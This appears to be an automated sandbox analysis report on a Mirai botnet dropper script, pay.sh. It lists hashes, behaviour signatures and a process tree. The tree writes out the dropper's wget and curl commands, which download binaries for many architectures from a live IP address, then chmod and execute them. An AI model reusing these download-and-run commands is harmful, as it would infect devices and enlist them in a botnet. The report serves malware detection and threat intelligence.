Analysis

  • max time kernel: 149s
  • max time network: 160s
  • platform: debian-9_armhf
  • resource: debian9-armhf-20240611-en
  • resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  • submitted: 13-12-2024 12:33

General

  • Target: pay.sh
  • Size: 2KB
  • MD5: 624b68623e669355734d1149ffd5d430
  • SHA1: ce07fb83638c8fa2865aa2b3d007c35902f7d96a
  • SHA256: 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc
  • SHA512: 143e96f06f585f9b6702e9e33497936b5c7b2675a8e0f9aaa3b93289926491ad7e6e204b114a7ca5c09d4bbd44cf2b2b005801ca31338b10d8cbbe9301c4bb23

Malware Config

Extracted

  • Family: mirai
  • Botnet: UNST

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (29435) number of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 12 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 6 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks CPU configuration 1 TTPs 10 IoCs

    Checks CPU information that indicates whether the system is a virtual machine.

  • Reads system network configuration 1 TTPs 6 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/pay.sh
    /tmp/pay.sh
    1⤵
    • Writes file to tmp directory
    PID:639
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.x86
      2⤵
      • Writes file to tmp directory
      PID:641
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.x86
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:666
    • /bin/cat
      cat b3astmode.x86
      2⤵
      PID:670
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.x86 pay.sh systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-tInZxI
      2⤵
      • File and Directory Permissions Modification
      PID:671
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      PID:672
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:674
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.mips
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:686
    • /bin/cat
      cat b3astmode.mips
      2⤵
      • System Network Configuration Discovery
      PID:699
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.mips b3astmode.x86 pay.sh systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-tInZxI
      2⤵
      • File and Directory Permissions Modification
      PID:701
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      PID:702
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.mpsl
      2⤵
      • Writes file to tmp directory
      PID:704
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.mpsl
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:720
    • /bin/cat
      cat b3astmode.mpsl
      2⤵
      PID:727
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-tInZxI
      2⤵
      • File and Directory Permissions Modification
      PID:728
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      PID:729
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.arm4
      2⤵
      PID:731
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.arm4
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:736
    • /bin/cat
      cat b3astmode.arm4
      2⤵
      PID:746
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-tInZxI
      2⤵
      • File and Directory Permissions Modification
      PID:748
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      PID:749
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.arm5
      2⤵
      • Writes file to tmp directory
      PID:750
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.arm5
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:767
    • /bin/cat
      cat b3astmode.arm5
      2⤵
      PID:768
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-tInZxI
      2⤵
      • File and Directory Permissions Modification
      PID:769
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:770
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.arm6
      2⤵
      • Writes file to tmp directory
      PID:774
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.arm6
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:780
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-tInZxI
      2⤵
      • File and Directory Permissions Modification
      PID:782
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:783
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.arm7
      2⤵
      • Writes file to tmp directory
      PID:805
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.arm7
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:808
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh
      2⤵
      • File and Directory Permissions Modification
      PID:813
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:814
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.ppc
      2⤵
      • Writes file to tmp directory
      PID:820
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.ppc
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:823
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.x86 pay.sh
      2⤵
      • File and Directory Permissions Modification
      PID:825
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:826
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.m68k
      2⤵
      • Writes file to tmp directory
      PID:832
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.m68k
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:833
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.m68k b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.x86 pay.sh
      2⤵
      • File and Directory Permissions Modification
      PID:835
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:836
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.sh4
      2⤵
      • Writes file to tmp directory
      PID:850
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.sh4
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:851
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.m68k b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.sh4 b3astmode.x86 pay.sh
      2⤵
      • File and Directory Permissions Modification
      PID:853
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:854

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/B3ASTM0DE
    Filesize: 23KB
    MD5: 6fdcdf8e1a1d76e45fa874a20a18b804
    SHA1: 8f8253e997ac2997a16e3a189f441d30d9a7675c
    SHA256: f7596984321fc1661a09c06d7da23513d21ab87ce7d3b2fed655ee1815288057
    SHA512: d9e44d922034cde7f8504d603326c58d3e3a37e3362384e8c528430421839ffcac379711172da673e734d01e7c26e81ef97b6ebb0d1245f690639622c89834bc

  • /tmp/B3ASTM0DE
    Filesize: 24KB
    MD5: 8e2bc890571386d49be504c19d6ae5f4
    SHA1: ec10343c39481e9867cab49607feb8351baa17dd
    SHA256: e5baf9cce449b61fe75c5bc6ceb2c0f82d4849d0827148bd33a6a1fb8f4b98a2
    SHA512: 75b232d0f4c28b33ec01f0c27bd4e73ddb17d007b6531a63266e08f32c6a8fbe1811aa7570c874c298a117edf31c2f2e191b35d628c65eed45ad723c718db4af

  • /tmp/B3ASTM0DE
    Filesize: 275B
    MD5: 8a052866f3090135b18f374ce1049566
    SHA1: cc858d4367e62558a09416f9521c159ec02ce42f
    SHA256: efb22cd5a845c646f8c7516e4d0936eca928b961da2d866a75aa4b2626fb6120
    SHA512: 0b8541f9fa9dce7430684e0c788f798667bba45373c66436226a04e32494a3b62520b8289ce49001009e429153aa2c27c8e4cd794c59f6eef65ab0aa818a9d16

  • /tmp/B3ASTM0DE
    Filesize: 49KB
    MD5: d585800f95f4f716d9faf633ebaa9433
    SHA1: ddf0a2bf2db94565ff0195178c35464c461bba26
    SHA256: ff3b43f66762a8b39fe29e4a99079f6086a9963015140775aa3ac5fe427ec558
    SHA512: af4c64a694d237e9994abaae75a5444050bbf87726b0d0025bdbcc94ce307b785ff93d79504069b390e51583db7fbc1735d164254bc3822b33154b96f6b94122

  • /tmp/b3astmode.x86
    Filesize: 22KB
    MD5: 873c6ba01596fdbb9c469fe1e0180243
    SHA1: 9236be2f17ba4d7422bf8f579d95c6226d3eaa48
    SHA256: 9959896b86d7dcb455c0f9d61ba74b19a3dc638ad08b51c4038ea5f092846170
    SHA512: f218dc4f64b089abae03e2c996d016e71021cb353d35c034db147b4b083453085ee74273d119dc6e7440b5ccad2e00acaada435a10910a6af4a92f071a0ed1ee